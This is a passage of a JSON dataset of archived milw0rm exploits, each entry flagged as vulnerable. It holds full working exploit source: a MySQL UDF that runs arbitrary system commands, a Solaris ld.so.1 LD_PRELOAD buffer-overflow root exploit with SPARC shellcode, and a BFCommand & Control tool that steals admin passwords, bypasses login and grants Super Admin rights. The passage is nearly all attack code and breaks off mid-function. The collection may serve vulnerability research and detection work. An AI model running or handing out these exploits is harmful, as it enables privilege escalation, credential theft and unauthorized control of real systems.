UDF_ARGS;\n\n\n\ntypedef struct st_udf_init {\n\n\tchar\t\t\tmaybe_null;\t// 1 if func can return NULL\n\n\tunsigned int\t\tdecimals;\t// for real functions\n\n\tunsigned long \t\tmax_length;\t// for string functions\n\n\tchar\t\t\t*ptr;\t\t// free ptr for func data\n\n\tchar\t\t\tconst_item;\t// 0 if result is constant\n\n} UDF_INIT;\n\n\n\nint do_system(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error)\n\n{\n\n\tif (args->arg_count != 1)\n\n\t\treturn(0);\n\n\n\n\tsystem(args->args[0]);\n\n\n\n\treturn(0);\n\n}\n\n\n\n// milw0rm.com [2004-12-24]",
950        "vulnerable": true
951    },
952    {
953        "exploit_id": 1182,
954        "content": "/*\n\n * $Id: raptor_ldpreload.c,v 1.1 2004/12/04 14:44:38 raptor Exp $\n\n *\n\n * raptor_ldpreload.c - ld.so.1 local, Solaris/SPARC 2.6/7/8/9\n\n * Copyright (c) 2003-2004 Marco Ivaldi <raptor@0xdeadbeef.info>\n\n *\n\n * Stack-based buffer overflow in the runtime linker, ld.so.1, on Solaris 2.6\n\n * through 9 allows local users to gain root privileges via a long LD_PRELOAD\n\n * environment variable (CAN-2003-0609).\n\n *\n\n * This exploit uses the ret-into-ld.so technique, to effectively bypass the\n\n * non-executable stack protection (noexec_user_stack=1 in /etc/system). This\n\n * is a weird vulnerability indeed: the standard ret-into-stack doesn't seem \n\n * to work properly for some reason (SEGV_ACCERR), and at least my version of \n\n * Solaris 8 (Generic_108528-13) is very hard to exploit (how to reach ret?).\n\n * \n\n * Usage:\n\n * $ gcc raptor_ldpreload.c -o raptor_ldpreload -ldl -Wall\n\n * $ ./raptor_ldpreload\n\n * [...]\n\n * # id\n\n * uid=0(root) gid=1(other)\n\n * # \n\n *\n\n * Vulnerable platforms:\n\n * Solaris 2.6 with 107733-10 and without 107733-11 [untested]\n\n * Solaris 7 with 106950-14 through 106950-22 and without 106950-23 [untested]\n\n * Solaris 8 with 109147-07 through 109147-24 and without 109147-25 [untested]\n\n * Solaris 9 without 112963-09 [tested]\n\n */\n\n\n\n#include <dlfcn.h>\n\n#include <fcntl.h>\n\n#include <link.h>\n\n#include <procfs.h>\n\n#include <stdio.h>\n\n#include <stdlib.h>\n\n#include <strings.h>\n\n#include <unistd.h>\n\n#include <sys/systeminfo.h>\n\n\n\n#define\tINFO1\t\"raptor_ldpreload.c - ld.so.1 local, Solaris/SPARC 2.6/7/8/9\"\n\n#define\tINFO2\t\"Copyright (c) 2003-2004 Marco Ivaldi <raptor@0xdeadbeef.info>\"\n\n\n\n#define\tVULN\t\"/usr/bin/su\"\t\t// default setuid target\n\n#define\tBUFSIZE\t1700 \t\t\t// size of the evil buffer\n\n#define\tFFSIZE\t64 + 1\t\t\t// size of the fake frame\n\n#define\tDUMMY\t0xdeadbeef\t\t// dummy memory address\n\n#define\tALIGN\t3\t\t\t// needed address alignment\n\n\n\n/* voodoo macros */\n\n#define\tVOODOO32(_,__,___)\t{_--;_+=(__+___-1)%4-_%4<0?8-_%4:4-_%4;}\n\n#define\tVOODOO64(_,__,___)\t{_+=7-(_+(__+___+1)*4+3)%8;}\n\n\n\nchar sc[] = /* Solaris/SPARC shellcode (12 + 48 = 60 bytes) */\n\n/* setuid() */\n\n\"\\x90\\x08\\x3f\\xff\\x82\\x10\\x20\\x17\\x91\\xd0\\x20\\x08\"\n\n/* execve() */\n\n\"\\x20\\xbf\\xff\\xff\\x20\\xbf\\xff\\xff\\x7f\\xff\\xff\\xff\\x90\\x03\\xe0\\x20\"\n\n\"\\x92\\x02\\x20\\x10\\xc0\\x22\\x20\\x08\\xd0\\x22\\x20\\x10\\xc0\\x22\\x20\\x14\"\n\n\"\\x82\\x10\\x20\\x0b\\x91\\xd0\\x20\\x08/bin/ksh\";\n\n\n\n/* globals */\n\nchar\t*env[256];\n\nint\tenv_pos = 0, env_len = 0;\n\n\n\n/* prototypes */\n\nint \tadd_env(char *string);\n\nvoid\tcheck_zero(int addr, char *pattern);\n\nint\tsearch_ldso(char *sym);\n\nint\tsearch_rwx_mem(void);\n\nvoid \tset_val(char *buf, int pos, int val);\n\n\n\n/*\n\n * main()\n\n */\n\nint main(int argc, char **argv)\n\n{\n\n\tchar\tbuf[BUFSIZE], ff[FFSIZE];\n\n\tchar\tplatform[256], release[256];\n\n\tint\ti, offset, ff_addr, sc_addr, str_addr;\n\n\tint\tplat_len, prog_len, rel;\n\n\t\n\n\tchar\t*arg[2] = {\"foo\", NULL};\n\n\tint\targ_len = 4, arg_pos = 1;\n\n\n\n\tint\tsb = ((int)argv[0] | 0xffff) & 0xfffffffc;\n\n\tint\tret = search_ldso(\"strcpy\");\n\n\tint\trwx_mem = search_rwx_mem();\n\n\n\n\t/* print exploit information */\n\n\tfprintf(stderr, \"%s\\n%s\\n\\n\", INFO1, INFO2);\n\n\n\n\t/* get some system information */\n\n\tsysinfo(SI_PLATFORM, platform, sizeof(platform) - 1);\n\n\tsysinfo(SI_RELEASE, release, sizeof(release) - 1);\n\n\trel = atoi(release + 2);\n\n\n\n\t/* prepare the evil buffer */\n\n\tmemset(buf, 'A', sizeof(buf));\n\n\tbuf[sizeof(buf) - 1] = 0x0;\n\n\tmemcpy(buf, \"LD_PRELOAD=/\", 12);\n\n\tbuf[sizeof(buf) - 2] = '/';\n\n\n\n\t/* prepare the fake frame */\n\n\tbzero(ff, sizeof(ff));\n\n\n\n\t/* \n\n\t * saved %l registers\n\n\t */\n\n\tset_val(ff, i  = 0, DUMMY);\t\t/* %l0 */\n\n\tset_val(ff, i += 4, DUMMY);\t\t/* %l1 */\n\n\tset_val(ff, i += 4, DUMMY);\t\t/* %l2 */\n\n\tset_val(ff, i += 4, DUMMY);\t\t/* %l3 */\n\n\tset_val(ff, i += 4, DUMMY);\t\t/* %l4 */\n\n\tset_val(ff, i += 4, DUMMY);\t\t/* %l5 */\n\n\tset_val(ff, i += 4, DUMMY);\t\t/* %l6 */\n\n\tset_val(ff, i += 4, DUMMY);\t\t/* %l7 */\n\n\n\n\t/*\n\n\t * saved %i registers\n\n\t */\n\n\tset_val(ff, i += 4, rwx_mem);\t\t/* %i0: 1st arg to strcpy() */\n\n\tset_val(ff, i += 4, 0x42424242);\t/* %i1: 2nd arg to strcpy() */\n\n\tset_val(ff, i += 4, DUMMY);\t\t/* %i2 */\n\n\tset_val(ff, i += 4, DUMMY);\t\t/* %i3 */\n\n\tset_val(ff, i += 4, DUMMY);\t\t/* %i4 */\n\n\tset_val(ff, i += 4, DUMMY);\t\t/* %i5 */\n\n\tset_val(ff, i += 4, sb - 1000);\t\t/* %i6: frame pointer */\n\n\tset_val(ff, i += 4, rwx_mem - 8);\t/* %i7: return address */\n\n\n\n\t/* fill the envp, keeping padding */\n\n\tsc_addr = add_env(ff);\n\n\tstr_addr = add_env(sc);\n\n\tadd_env(\"bar\");\n\n\tadd_env(buf);\n\n\tadd_env(NULL);\n\n\n\n\t/* calculate the offset to argv[0] (voodoo magic) */\n\n\tplat_len = strlen(platform) + 1;\n\n\tprog_len = strlen(VULN) + 1;\n\n\toffset = arg_len + env_len + plat_len + prog_len;\n\n\tif (rel > 7)\n\n\t\tVOODOO64(offset, arg_pos, env_pos)\n\n\telse\n\n\t\tVOODOO32(offset, plat_len, prog_len)\n\n\n\n\t/* calculate the needed addresses */\n\n\tff_addr = sb - offset + arg_len;\n\n\tsc_addr += ff_addr;\n\n\tstr_addr += ff_addr;\n\n\n\n\t/* set fake frame's %i1 */\n\n\tset_val(ff, 36, sc_addr);\t\t/* 2nd arg to strcpy() */\n\n\t\n\n\t/* fill the evil buffer */\n\n\tfor (i = 12 + ALIGN; i < 1296; i += 4)\n\n\t\tset_val(buf, i, str_addr);\t/* must be a valid string */\n\n\t/* to avoid distance bruteforcing */\n\n\tfor (i = 1296 + ALIGN; i < BUFSIZE - 12; i += 4) {\n\n\t\tset_val(buf, i, ff_addr);\n\n\t\tset_val(buf, i += 4, ret - 4);\t/* strcpy(), after the save */\n\n\t}\n\n\n\n\t/* print some output */\n\n\tfprintf(stderr, \"Using SI_PLATFORM\\t: %s (%s)\\n\", platform, release);\n\n\tfprintf(stderr, \"Using stack base\\t: 0x%p\\n\", (void *)sb);\n\n\tfprintf(stderr, \"Using string address\\t: 0x%p\\n\", (void *)str_addr);\n\n\tfprintf(stderr, \"Using rwx_mem address\\t: 0x%p\\n\", (void *)rwx_mem);\n\n\tfprintf(stderr, \"Using sc address\\t: 0x%p\\n\", (void *)sc_addr);\n\n\tfprintf(stderr, \"Using ff address\\t: 0x%p\\n\", (void *)ff_addr);\n\n\tfprintf(stderr, \"Using strcpy() address\\t: 0x%p\\n\\n\", (void *)ret);\n\n\n\n\t/* run the vulnerable program */\n\n\texecve(VULN, arg, env);\n\n\tperror(\"execve\");\n\n\texit(0);\n\n}\n\n\n\n/*\n\n * add_env(): add a variable to envp and pad if needed\n\n */\n\nint add_env(char *string)\n\n{\n\n\tint\ti;\n\n\n\n\t/* null termination */\n\n\tif (!string) {\n\n\t\tenv[env_pos] = NULL;\n\n\t\treturn(env_len);\n\n\t}\n\n\n\n\t/* add the variable to envp */\n\n\tenv[env_pos] = string;\n\n\tenv_len += strlen(string) + 1;\n\n\tenv_pos++;\n\n\n\n\t/* pad the envp using zeroes */\n\n\tif ((strlen(string) + 1) % 4)\n\n\t\tfor (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) {\n\n\t\t\tenv[env_pos] = string + strlen(string);\n\n\t\t\tenv_len++;\n\n\t\t}\n\n\n\n\treturn(env_len);\n\n}\n\n\n\n/*\n\n * check_zero(): check an address for the presence of a 0x00\n\n */\n\nvoid check_zero(int addr, char *pattern)\n\n{\n\n\tif (!(addr & 0xff) || !(addr & 0xff00) || !(addr & 0xff0000) ||\n\n\t    !(addr & 0xff000000)) {\n\n\t\tfprintf(stderr, \"Error: %s contains a 0x00!\\n\", pattern);\n\n\t\texit(1);\n\n\t}\n\n}\n\n\n\n/*\n\n * search_ldso(): search for a symbol inside ld.so.1\n\n */\n\nint search_ldso(char *sym)\n\n{\n\n\tint\t\taddr;\n\n\tvoid\t\t*handle;\n\n\tLink_map\t*lm;\n\n\n\n\t/* open the executable object file */\n\n\tif ((handle = dlmopen(LM_ID_LDSO, NULL, RTLD_LAZY)) == NULL) {\n\n\t\tperror(\"dlopen\");\n\n\t\texit(1);\n\n\t}\n\n\n\n\t/* get dynamic load information */\n\n\tif ((dlinfo(handle, RTLD_DI_LINKMAP, &lm)) == -1) {\n\n\t\tperror(\"dlinfo\");\n\n\t\texit(1);\n\n\t}\n\n\n\n\t/* search for the address of the symbol */\n\n\tif ((addr = (int)dlsym(handle, sym)) == NULL) {\n\n\t\tfprintf(stderr, \"sorry, function %s() not found\\n\", sym);\n\n\t\texit(1);\n\n\t}\n\n\n\n\t/* close the executable object file */\n\n\tdlclose(handle);\n\n\n\n\tcheck_zero(addr - 4, sym);\n\n\treturn(addr);\n\n}\n\n\n\n/*\n\n * search_rwx_mem(): search for an RWX memory segment valid for all\n\n * programs (typically, /usr/lib/ld.so.1) using the proc filesystem\n\n */\n\nint search_rwx_mem(void)\n\n{\n\n\tint\tfd;\n\n\tchar\ttmp[16];\n\n\tprmap_t\tmap;\n\n\tint\taddr = 0, addr_old;\n\n\n\n\t/* open the proc filesystem */\n\n\tsprintf(tmp,\"/proc/%d/map\", (int)getpid());\n\n\tif ((fd = open(tmp, O_RDONLY)) < 0) {\n\n\t\tfprintf(stderr, \"can't open %s\\n\", tmp);\n\n\t\texit(1);\n\n\t}\n\n\n\n\t/* search for the last RWX memory segment before stack (last - 1) */\n\n\twhile (read(fd, &map, sizeof(map)))\n\n\t\tif (map.pr_vaddr)\n\n\t\t\tif (map.pr_mflags & (MA_READ | MA_WRITE | MA_EXEC)) {\n\n\t\t\t\taddr_old = addr;\n\n\t\t\t\taddr = map.pr_vaddr;\n\n\t\t\t}\n\n\tclose(fd);\n\n\n\n\t/* add 4 to the exact address NULL bytes */\n\n\tif (!(addr_old & 0xff))\n\n\t\taddr_old |= 0x04;\n\n\tif (!(addr_old & 0xff00))\n\n\t\taddr_old |= 0x0400;\n\n\n\n\treturn(addr_old);\n\n}\n\n\n\n/*\n\n * set_val(): copy a dword inside a buffer\n\n */\n\nvoid set_val(char *buf, int pos, int val)\n\n{\n\n\tbuf[pos] =      (val & 0xff000000) >> 24;\n\n\tbuf[pos + 1] =  (val & 0x00ff0000) >> 16;\n\n\tbuf[pos + 2] =  (val & 0x0000ff00) >> 8;\n\n\tbuf[pos + 3] =  (val & 0x000000ff);\n\n}\n\n\n\n// milw0rm.com [2004-12-24]",
955        "vulnerable": true
956    },
957    {
958        "exploit_id": 1183,
959        "content": "/*\n\n\n\nby Luigi Auriemma\n\n\n\nhttp://aluigi.altervista.org/fakep/tcpfp.zip\n\n\n\n*/\n\n\n\n#include <stdio.h>\n\n#include <stdlib.h>\n\n#include <string.h>\n\n#include <stdarg.h>\n\n\n\n#ifdef WIN32\n\n    #include <winsock.h>\n\n/*\n\n   Header file used for manage errors in Windows\n\n   It support socket and errno too\n\n   (this header replace the previous sock_errX.h)\n\n*/\n\n\n\n#include <string.h>\n\n#include <errno.h>\n\n\n\n\n\n\n\nvoid std_err(void) {\n\n    char    *error;\n\n\n\n    switch(WSAGetLastError()) {\n\n        case 10004: error = \"Interrupted system call\"; break;\n\n        case 10009: error = \"Bad file number\"; break;\n\n        case 10013: error = \"Permission denied\"; break;\n\n        case 10014: error = \"Bad address\"; break;\n\n        case 10022: error = \"Invalid argument (not bind)\"; break;\n\n        case 10024: error = \"Too many open files\"; break;\n\n        case 10035: error = \"Operation would block\"; break;\n\n        case 10036: error = \"Operation now in progress\"; break;\n\n        case 10037: error = \"Operation already in progress\"; break;\n\n        case 10038: error = \"Socket operation on non-socket\"; break;\n\n        case 10039: error = \"Destination address required\"; break;\n\n        case 10040: error = \"Message too long\"; break;\n\n        case 10041: error = \"Protocol wrong type for socket\"; break;\n\n        case 10042: error = \"Bad protocol option\"; break;\n\n        case 10043: error = \"Protocol not supported\"; break;\n\n        case 10044: error = \"Socket type not supported\"; break;\n\n        case 10045: error = \"Operation not supported on socket\"; break;\n\n        case 10046: error = \"Protocol family not supported\"; break;\n\n        case 10047: error = \"Address family not supported by protocol family\"; break;\n\n        case 10048: error = \"Address already in use\"; break;\n\n        case 10049: error = \"Can't assign requested address\"; break;\n\n        case 10050: error = \"Network is down\"; break;\n\n        case 10051: error = \"Network is unreachable\"; break;\n\n        case 10052: error = \"Net dropped connection or reset\"; break;\n\n        case 10053: error = \"Software caused connection abort\"; break;\n\n        case 10054: error = \"Connection reset by peer\"; break;\n\n        case 10055: error = \"No buffer space available\"; break;\n\n        case 10056: error = \"Socket is already connected\"; break;\n\n        case 10057: error = \"Socket is not connected\"; break;\n\n        case 10058: error = \"Can't send after socket shutdown\"; break;\n\n        case 10059: error = \"Too many references, can't splice\"; break;\n\n        case 10060: error = \"Connection timed out\"; break;\n\n        case 10061: error = \"Connection refused\"; break;\n\n        case 10062: error = \"Too many levels of symbolic links\"; break;\n\n        case 10063: error = \"File name too long\"; break;\n\n        case 10064: error = \"Host is down\"; break;\n\n        case 10065: error = \"No Route to Host\"; break;\n\n        case 10066: error = \"Directory not empty\"; break;\n\n        case 10067: error = \"Too many processes\"; break;\n\n        case 10068: error = \"Too many users\"; break;\n\n        case 10069: error = \"Disc Quota Exceeded\"; break;\n\n        case 10070: error = \"Stale NFS file handle\"; break;\n\n        case 10091: error = \"Network SubSystem is unavailable\"; break;\n\n        case 10092: error = \"WINSOCK DLL Version out of range\"; break;\n\n        case 10093: error = \"Successful WSASTARTUP not yet performed\"; break;\n\n        case 10071: error = \"Too many levels of remote in path\"; break;\n\n        case 11001: error = \"Host not found\"; break;\n\n        case 11002: error = \"Non-Authoritative Host not found\"; break;\n\n        case 11003: error = \"Non-Recoverable errors: FORMERR, REFUSED, NOTIMP\"; break;\n\n        case 11004: error = \"Valid name, no data record of requested type\"; break;\n\n        default: error = strerror(errno); break;\n\n    }\n\n    fprintf(stderr, \"\\nError: %s\\n\", error);\n\n    exit(1);\n\n}\n\n\n\n// inserted winerr.h /str0ke\n\n\n\n    #define close   closesocket\n\n#else\n\n    #include <unistd.h>\n\n    #include <sys/socket.h>\n\n    #include <sys/types.h>\n\n    #include <arpa/inet.h>\n\n    #include <netinet/in.h>\n\n    #include <netdb.h>\n\n#endif\n\n\n\n\n\n\n\n#define VER         \"0.1\"\n\n#define PORT        5555\n\n#define MYPORT      3333\n\n#define BUFFSZ      8192\n\n#define DEL         0x1e\n\n#define END         \"\\x00\\x40\\x40\\x00\"\n\n\n\n\n\n\n\nvoid proxy(int sock, u_char *buff, int size);\n\nint check_drop(u_char *data);\n\nvoid show_bfcc(u_char *buff, int len);\n\nvoid send_bfcc(int sock, ...);\n\nint recv_bfcc(int sock, u_char *buff, int size);\n\nu_int resolv(char *host);\n\nvoid std_err(void);\n\n\n\n\n\n\n\nint main(int argc, char *argv[]) {\n\n    struct  sockaddr_in peer;\n\n    int     sd,\n\n            len,\n\n            attack,\n\n            scan = 3;\n\n    u_short port = PORT;\n\n    u_char  buff[BUFFSZ];\n\n\n\n#ifdef WIN32\n\n    WSADATA    wsadata;\n\n    WSAStartup(MAKEWORD(1,0), &wsadata);\n\n#endif\n\n\n\n\n\n    setbuf(stdout, NULL);\n\n\n\n    fputs(\"\\n\"\n\n        \"BFCommand & Control login bypass \"VER\"\\n\"\n\n        \"  BFCC  <= 1.22_A\\n\"\n\n        \"  BFVCC <= 2.14_B\\n\"\n\n        \"  BFVCCDaemon is NOT vulnerable\\n\"\n\n        \"by Luigi Auriemma\\n\"\n\n        \"e-mail: aluigi@autistici.org\\n\"\n\n        \"web:    http://aluigi.altervista.org\\n\"\n\n        \"\\n\", stdout);\n\n\n\n    if(argc < 3) {\n\n        printf(\"\\n\"\n\n            \"Usage: %s <attack> <host> [port(%hu)]\\n\"\n\n            \"\\n\"\n\n            \"Attack:\\n\"\n\n            \" 1 = passwords stoler, sends the GetUserAccounts anonymously and gets all the\\n\"\n\n            \"     usernames and passwords in the server manager (bug A)\\n\"\n\n            \" 2 = checks if is possible to bypass the login using a NULL username (bug B)\\n\"\n\n            \" 3 = proxy server to use with BFC3 and BFVC3 clients which grants access to any\\n\"\n\n            \"     vulnerable server in total anonymity and unbootable (bug A and C)\\n\"\n\n            \" 4 = explanation of how test bug D, server full forever\\n\"\n\n            \"\\n\"\n\n            \" Note: The default port of BFCC is 4555 while is 5555 for BFVCC (default)\\n\"\n\n            \"       This tool has been written to be compatible with BFVCC so only attack 1\\n\"\n\n            \"       and 4 can be used with success versus BFCC using this specific tool\\n\"\n\n            \"\\n\", argv[0], port);\n\n        exit(1);\n\n    }\n\n\n\n    attack = atoi(argv[1]);\n\n    if((attack < 1) || (attack > 4)) {\n\n        fputs(\"\\nError: you must choose a number between the range of available attacks\\n\\n\", stdout);\n\n        exit(1);\n\n    }\n\n    if(attack == 4) {\n\n        fputs(\"\\n\"\n\n            \"Download the tool \\\"Generic TCP Fake Players DoS\\\" from here:\\n\"\n\n            \"\\n\"\n\n            \"  http://aluigi.altervista.org/fakep/tcpfp.zip\\n\"\n\n            \"\\n\"\n\n            \"Launch it with the following arguments\\n\"\n\n            \"\\n\"\n\n            \"  tcpfp -r full 127.0.0.1 5555\\n\"\n\n            \"\\n\"\n\n            \"substituiting 127.0.0.1 and 5555 with the server and port of the server you\\n\"\n\n            \"want to test.\\n\"\n\n            \"\\n\", stdout);\n\n        return(0);\n\n    }\n\n\n\n    if(argc > 3) port = atoi(argv[3]);\n\n\n\n    peer.sin_addr.s_addr = resolv(argv[2]);\n\n    peer.sin_port        = htons(port);\n\n    peer.sin_family      = AF_INET;\n\n\n\n    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);\n\n    if(sd < 0) std_err();\n\n\n\n    while(scan--) {\n\n        printf(\"- target   %s : %hu\\n\",\n\n        inet_ntoa(peer.sin_addr), port);\n\n        len = connect(sd, (struct sockaddr *)&peer, sizeof(peer));\n\n        if(!len) break;\n\n        fputs(\"  no service available on this port\\n\", stdout);\n\n        peer.sin_port = htons(++port);\n\n    }\n\n    if(len < 0) std_err();\n\n\n\n    if(attack == 1) {\n\n        fputs(\"- receive server's informations:\\n\", stdout);\n\n        len = recv_bfcc(sd, buff, BUFFSZ);\n\n        show_bfcc(buff, len);\n\n\n\n        fputs(\"- send anonymous GetUserAccounts commands\\n\", stdout);\n\n        send_bfcc(sd, \"GetUserAccounts\", NULL);\n\n\n\n        fputs(\n\n            \"- receive full list of admin usernames and passwords\\n\"\n\n            \"  Username   Password:\\n\", stdout);\n\n        len = recv_bfcc(sd, buff, BUFFSZ);\n\n        show_bfcc(buff, len);\n\n\n\n    } else if(attack == 2) {\n\n        fputs(\"- receive server's informations:\\n\", stdout);\n\n        len = recv_bfcc(sd, buff, BUFFSZ);\n\n        show_bfcc(buff, len);\n\n\n\n        fputs(\"- send login command with NULL nickname\\n\", stdout);\n\n        send_bfcc(sd,\n\n            \"login\",\n\n            \"\\0\",   // BUG exploited here\n\n            \"password\",\n\n            \"username\",\n\n            \"???\",\n\n            \"\",\n\n            NULL);\n\n\n\n        fputs(\"- check for success message:\\n\", stdout);\n\n        len = recv_bfcc(sd, buff, BUFFSZ);\n\n        show_bfcc(buff, len);\n\n\n\n    } else if(attack == 3) {\n\n        proxy(sd, buff, BUFFSZ);\n\n    }\n\n\n\n    close(sd);\n\n    free(buff);\n\n    return(0);\n\n}\n\n\n\n\n\n\n\nvoid proxy(int sock, u_char *buff, int size) {\n\n    struct  sockaddr_in peer;\n\n    fd_set  readset;\n\n    int     sdl,\n\n            sda,\n\n            on = 1,\n\n            len,\n\n            psz,\n\n            selsock;\n\n\n\n    peer.sin_addr.s_addr = INADDR_ANY;\n\n    peer.sin_port        = htons(MYPORT);\n\n    peer.sin_family      = AF_INET;\n\n    psz                  = sizeof(peer);\n\n\n\n    printf(\"- bind port %hu\\n\", MYPORT);\n\n\n\n    sdl = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);\n\n    if(sdl < 0) std_err();\n\n    if(setsockopt(sdl, SOL_SOCKET, SO_REUSEADDR, (char *)&on, sizeof(on))\n\n      < 0) std_err();\n\n    if(bind(sdl, (struct sockaddr *)&peer, sizeof(peer))\n\n      < 0) std_err();\n\n    if(listen(sdl, SOMAXCONN)\n\n      < 0) std_err();\n\n\n\n    printf(\"- launch BFC3 or BFVC3 and sets %s as server and %hu as port\\n\",\n\n        \"127.0.0.1\", MYPORT);\n\n\n\n    sda = accept(sdl, (struct sockaddr *)&peer, &psz);\n\n    if(sda < 0) std_err();\n\n\n\n    printf(\"- connected\\n\");\n\n\n\n    send_bfcc(sda,  // enable everything\n\n        \"master\",\n\n        \"null/null/null/0/Map_True/\"\n\n        \"Action-Warn\"                           \"\\xff\" \"1\" \"\\xff\"\n\n        \"Action-Kick\"                           \"\\xff\" \"1\" \"\\xff\"\n\n        \"Action-Insta-Kick (No Reason)\"         \"\\xff\" \"1\" \"\\xff\"\n\n        \"Action-Ban\"                            \"\\xff\" \"1\" \"\\xff\"\n\n        \"Action-Insta-Ban (No Reason)\"          \"\\xff\" \"1\" \"\\xff\"\n\n        \"Action-Remove Ban\"                     \"\\xff\" \"1\" \"\\xff\"\n\n        \"Action-Clear Banlist\"                  \"\\xff\" \"1\" \"\\xff\"\n\n        \"Action-Force to Other Team\"            \"\\xff\" \"1\" \"\\xff\"\n\n        \"Action-Kill Player\"                    \"\\xff\" \"1\" \"\\xff\"\n\n        \"Action-Send Message to Server\"         \"\\xff\" \"1\" \"\\xff\"\n\n        \"Game-Pause\"                            \"\\xff\" \"1\" \"\\xff\"\n\n        \"Game-Toggle Auto-Balance\"              \"\\xff\" \"1\" \"\\xff\"\n\n        \"Action-Request PB Screenshot\"          \"\\xff\" \"1\" \"\\xff\"\n\n        \"BFVC3-Maps Change Maps\"                \"\\xff\" \"1\" \"\\xff\"\n\n        \"BFVC3-Maps Change 2 Map NOT in \"       \"\\xff\" \"1\" \"\\xff\"\n\n        \"BFVC3-Maps Restart Map\"                \"\\xff\" \"1\" \"\\xff\"\n\n        \"BFVC3-Maps Set Next Map\"               \"\\xff\" \"1\" \"\\xff\"\n\n        \"BFVC3-Admin Change Server Settings\"    \"\\xff\" \"1\" \"\\xff\"\n\n        \"BFVC3-Admin Change FF Settings\"        \"\\xff\" \"1\" \"\\xff\"\n\n        \"BFVC3-Admin Change Misc Settings\"      \"\\xff\" \"1\" \"\\xff\"\n\n        \"BFVC3-Admin Change Voting Settings\"    \"\\xff\" \"1\" \"\\xff\"\n\n        \"USERS-Access User Accounts\"            \"\\xff\" \"1\" \"\\xff\"\n\n        \"USERS-Edit User Profiles\"              \"\\xff\" \"1\" \"\\xff\"\n\n        \"USERS-Create User\"                     \"\\xff\" \"1\" \"\\xff\"\n\n        \"USERS-Edit User\"                       \"\\xff\" \"1\" \"\\xff\"\n\n        \"USERS-Delete User\"                     \"\\xff\" \"1\" \"\\xff\"\n\n        \"BFVCC-Access Manager Control Panel\"    \"\\xff\" \"1\" \"\\xff\"\n\n        \"BFVCC-Access to Auto Admin Settings\"   \"\\xff\" \"1\" \"\\xff\"\n\n        \"BFVCC-Load Manager Profiles\"           \"\\xff\" \"1\" \"\\xff\"\n\n        \"BFVCC-Save Changes to Profiles\"        \"\\xff\" \"1\" \"\\xff\"\n\n        \"BFVCC-Create Manager Profiles\"         \"\\xff\" \"1\" \"\\xff\"\n\n        \"BFVCC-Delete Manager Profiles\"         \"\\xff\" \"1\" \"\\xff\"\n\n        \"CC-Access the CC Editor\"               \"\\xff\" \"1\" \"\\xff\"\n\n        \"CC-Save Changes to CC Profiles\"        \"\\xff\" \"1\" \"\\xff\"\n\n        \"CC-Create new CC Profiles\"             \"\\xff\" \"1\" \"\\xff\"\n\n        \"CC-Delete CC Profile\"                  \"\\xff\" \"1\" \"\\xff\"\n\n        \"CC-Change a Maps CC Profile\"           \"\\xff\" \"1\" \"\\xff\"\n\n        \"PB-Edit PB Config Files\"               \"\\xff\" \"1\" \"\\xff\",\n\n        \"15567\",                                // default server port (useless)\n\n        \"admin\"                                 \"\\xff\", // username    (useless)\n\n        \"True\",\n\n        \"Super Admin\",                          // profile\n\n        \"0\",\n\n        NULL);\n\n\n\n    selsock = ((sock > sda) ? sock : sda) + 1;\n\n\n\n    for(;;) {\n\n        FD_ZERO(&readset);\n\n        FD_SET(sock, &readset);\n\n        FD_SET(sda, &readset);\n\n        if(select(selsock, &readset, NULL, NULL, NULL)\n\n          < 0) std_err();\n\n\n\n        if(FD_ISSET(sda, &readset)) {\n\n            len = recv_bfcc(sda, buff, size);\n\n            fwrite(buff, len, 1, stdout);\n\n\n\n            if(check_drop(buff)) continue;\n\n\n\n            len = send(sock, buff, len, 0);\n\n            if(len < 0) std_err();\n\n        }\n\n\n\n        if(FD_ISSET(sock, &readset)) {\n\n            len = recv_bfcc(sock, buff, size);\n\n            fwrite(buff, len, 1, stdout);\n\n\n\n            if(check_drop(buff)) continue;\n\n\n\n            len = send(sda, buff, len, 0);\n\n            if(len < 0) std_err();\n\n        }\n\n    }\n\n\n\n    close(sda);\n\n    close(sdl);\n\n}\n\n\n\n\n\n\n\nint check_drop(u_char *cmd) {\n\n    int     i;\n\n    u_char  *p,\n\n            *drop[] = {\n\n                \"login\",\n\n                \"Boot\",\n\n                \"loginfailed\",\n\n                NULL\n\n            };\n\n\n\n    p = strchr(cmd, DEL);\n\n    if(!p) {\n\n        p = strchr(cmd, END[0]);\n\n        if(!p) return(0);\n\n    }\n\n\n\n    for(i = 0; drop[i]; i++) {\n\n        if(!strncmp(cmd, drop[i], p - cmd)) return(1);\n\n    }\n\n\n\n    return(0);\n\n}\n\n\n\n\n\n\n\nvoid show_bfcc(u_char *buff, int len) {\n\n    u_char  *p,\n\n            *l,\n\n            *limit = buff + len;\n\n\n\n    for(p = buff; p < limit; p = l + 1) {\n\n        for(l = p; *l != DEL; l++) {\n\n            if(!memcmp(l, END, 4)) return;\n\n            if(!memcmp(l, \"|;|\", 3)) {\n\n                if(*(l - 1) == '\\t') *(l - 1) = ' ';\n\n                memcpy(l, \"\\n  \", 3);\n\n            }\n\n        }\n\n        *l = 0;\n\n        printf(\"  %s\\n\", p);\n\n    }\n\n}\n\n\n\n\n\n\n\nvoid send_bfcc(int sock, ...) { // final NULL required\n\n    va_list ap;\n\n    int     len;\n\n    u_char  *s;\n\n\n\n    va_start(ap, sock);\n\n\n\n    s = va_arg(ap, u_char *);\n\n    if(s) {\n\n        for(;;) {\n\n            len = strlen(s);\n\n            if(!len) len++;\n\n            send(sock, s, len, 0);\n\n            s = va_arg(ap, u_char *);\n\n            if(!s) break;\n\n            send(sock, \"\\x1e\", 1, 0);\n\n        }\n\n    }\n\n\n\n    va_end(ap);\n\n\n\n    send(sock, END, 4, 0);\n\n}\n\n\n\n\n\n\n\nint recv_bfcc(int sock, u_char *buff, int size) {\n\n    int     len = 0;\n\n\n\n        // one command at time, slower but better\n\n    while(len < size) {\n\n        if(recv(sock, buff + len, 1, 0) <= 0) {\n\n            fputs(\"\\nError: connection interrupted\\n\\n\", stdout);\n\n            exit(1);\n\n        }\n\n        len++;\n\n        if(!memcmp(buff + len - 4, END, 4)) break;\n\n    }\n\n\n\n    if(len == size) {\n\n        fputs(\"\\nError: command too long\\n\\n\", stdout);\n\n        exit(1);\n\n    }\n\n\n\n    return(len);\n\n}\n\n\n\n\n\n\n\nu_int resolv(char *host) {\n\n    struct  hostent *hp;\n\n    u_int   host_ip;\n\n\n\n    host_ip = inet_addr(host);\n\n    if(host_ip == INADDR_NONE) {\n\n        